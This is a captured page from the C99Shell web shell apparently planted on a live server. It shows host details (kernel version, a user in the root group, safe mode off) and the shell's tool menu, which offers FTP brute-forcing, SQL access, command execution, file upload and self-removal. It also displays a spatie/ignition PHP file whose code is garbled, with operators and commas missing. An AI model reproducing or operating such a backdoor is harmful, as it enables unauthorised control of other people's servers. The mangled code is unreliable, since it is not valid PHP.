!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sender.picotech.app/public_html/vendor/spatie/ignition/src/Solutions/OpenAi/   drwxr-xr-x
Free 26.27 GB of 117.98 GB (22.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OpenAiSolutionResponse.php (1.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Ignition\Solutions\OpenAi;

class 
OpenAiSolutionResponse
{
    protected 
string $rawText;

    public function 
__construct(string $rawText)
    {
        
$this->rawText trim($rawText);
    }

    public function 
description(): string
    
{
        return 
$this->between('FIX''ENDFIX'$this->rawText);
    }

    public function 
links(): array
    {
        
$textLinks $this->between('LINKS''ENDLINKS'$this->rawText);

        
$textLinks explode(PHP_EOL$textLinks);

        
$textLinks array_map(function ($textLink) {
            
$textLink str_replace('\\''\\\\'$textLink);
            
$textLink str_replace('\\\\\\''\\\\'$textLink);

            return 
json_decode($textLinktrue);
        }, 
$textLinks);

        
array_filter($textLinks);

        
$links = [];
        foreach (
$textLinks as $textLink) {
            
$links[$textLink['title']] = $textLink['url'];
        }

        return 
$links;
    }

    protected function 
between(string $startstring $endstring $text): string
    
{
        
$startPosition strpos($text$start);
        if (
$startPosition === false) {
            return 
"";
        }

        
$startPosition += strlen($start);
        
$endPosition strpos($text$end$startPosition);

        if (
$endPosition === false) {
            return 
"";
        }

        return 
trim(substr($text$startPosition$endPosition $startPosition));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--